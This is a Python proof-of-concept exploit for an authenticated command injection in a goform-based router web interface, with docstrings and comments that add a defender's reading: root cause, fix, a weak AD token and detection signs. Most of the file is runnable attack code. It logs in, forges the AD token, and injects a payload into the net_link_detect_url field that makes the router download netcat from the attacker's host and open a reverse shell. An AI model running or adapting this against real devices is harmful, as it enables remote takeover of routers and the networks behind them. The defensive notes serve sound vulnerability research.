"""Proof-of-concept for an authenticated command injection in a goform-based router web UI.

Flow (see ``__main__``): log in with the device password, derive the ``AD`` request
token the device expects, then submit the ``WATCH_DOG_SWITCH`` form with a shell
command string in ``net_link_detect_url``.  The script only reports what the device
answered; nothing here parses the result beyond a substring check.

Defender's reading of the same code:
  * Root cause (device side, inferred from the payload shape): the
    ``net_link_detect_url`` value is apparently interpolated into a shell command
    unescaped, so a leading ``;`` ends the intended command.  The fix is to validate
    the field as a URL and run the link-detection tool without a shell
    (argv-style exec), not to filter individual characters.
  * The ``AD`` token is md5(md5(fixed firmware strings) + device-supplied ``RD``);
    every input is either public or handed out by the device, so it is not an
    effective anti-forgery control -- NOTE(review): this is the natural reading of
    ``get_AD``; confirm against the firmware.
  * Detection: a successful run causes the device itself to fetch
    ``http://<attacker-ip>:8080/netcat`` and open an outbound TCP connection to
    port 9999 -- outbound connections from a router's management plane to a LAN/WAN
    host on those ports are the observable artefact.
"""

import time
import requests
import hashlib
import sys
import base64

# Firmware/module version strings that seed the AD token in get_AD().  They are
# constants for a given firmware build; the script hard-codes one build.
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"

# Base form body for every goform command: the isTest flag plus the command id.
FORM = lambda x: {"isTest": False, "goformId": x}

# One session so the login cookie is reused by rce(); note get_AD() does NOT use it.
s = requests.Session()


def login() -> None:
    """POST the LOGIN form with the (base64-encoded) password and print the outcome.

    Reads the module-level ``HOST``, ``PASSWD`` and ``HDRS`` that ``__main__`` sets.
    The device's ``result`` field is treated as success only when it equals "0".
    """
    data = FORM("LOGIN")
    data["password"] = PASSWD
    status = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=data,
    ).json()
    login_status = "[+] Login: "
    login_status += "success" if status["result"] == "0" else "fail"
    print(login_status)


def get_AD() -> str:
    """Compute the ``AD`` token the device expects on state-changing goform posts.

    Returns ``md5(md5(wa_inner_version + cr_version) + RD)`` where ``RD`` is fetched
    from the device's ``cmd=RD`` endpoint.  The trailing ``_=<epoch>`` query
    parameter is only a cache-buster.
    """

    def md5(s: str) -> str:
        # Hex MD5 of a UTF-8 string.  The parameter name shadows the module-level
        # Session ``s`` inside this helper; harmless here, but easy to misread.
        m = hashlib.md5()
        m.update(s.encode("utf-8"))
        return m.hexdigest()

    a = md5(wa_inner_version + cr_version)
    # Uses the module-level requests.get, not the Session ``s``, so no login
    # cookies accompany this request -- the RD endpoint is evidently reachable
    # without them (assumption; the script does not check the HTTP status).
    rd = requests.get(
        f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
        headers=HDRS,
    )
    return md5(a + rd.json()["RD"])


def get_response(server_resp: requests.Response) -> None:
    """Print whether the device's reply to the WATCH_DOG_SWITCH post contained "success".

    This is a substring test on the raw body, not a parse of the JSON result, so it
    only indicates the form was accepted -- not that the injected command ran.
    """
    status = "[+] payload injected: "
    if "success" in server_resp.text:
        status += "success"
    else:
        status += "fail"
    print(status)


def rce() -> None:
    """Submit the WATCH_DOG_SWITCH form with a shell command in ``net_link_detect_url``.

    Reads the module-level ``HOST``, ``IP`` and ``HDRS``.  ``net_link_detect_enable``
    is set so the device acts on the URL field; ``AD`` is the token from get_AD().
    """
    dog_form = FORM("WATCH_DOG_SWITCH")
    dog_form["net_link_detect_enable"] = 1
    # Injection point: the leading ";" terminates whatever command the firmware
    # builds around the URL value; the rest is what the device is asked to run.
    payload = ";"
    payload += f"curl {IP}:8080/netcat --output /tmp/netcat; "
    payload += "chmod +x /tmp/netcat;"
    payload += f"/tmp/netcat -e sh {IP} 9999"
    dog_form["net_link_detect_url"] = payload
    dog_form["AD"] = get_AD()
    a = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=dog_form,
    )
    get_response(a)


if __name__ == "__main__":
    if len(sys.argv) < 4:
        # NOTE(review): the argument placeholders appear to be missing from this
        # usage string (angle-bracketed text was probably dropped when the page
        # was extracted); the three arguments read below are host URL, password
        # and the address the device should connect back to.
        print(
            "usage: python3 exploit.py http:// "
        )
        sys.exit(0)
    HOST = sys.argv[1]
    # base64 is an encoding the device's login form expects, not protection:
    # the credential is recoverable from the request unless HOST is https.
    PASSWD = base64.b64encode(sys.argv[2].encode()).decode()
    IP = sys.argv[3]
    # Origin/Referer are pinned to the device host, which suggests the UI checks
    # them as a same-origin/CSRF control (assumption); the User-Agent is a fixed
    # legacy string and is a trivially matchable fingerprint in access logs.
    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }
    login()
    rce()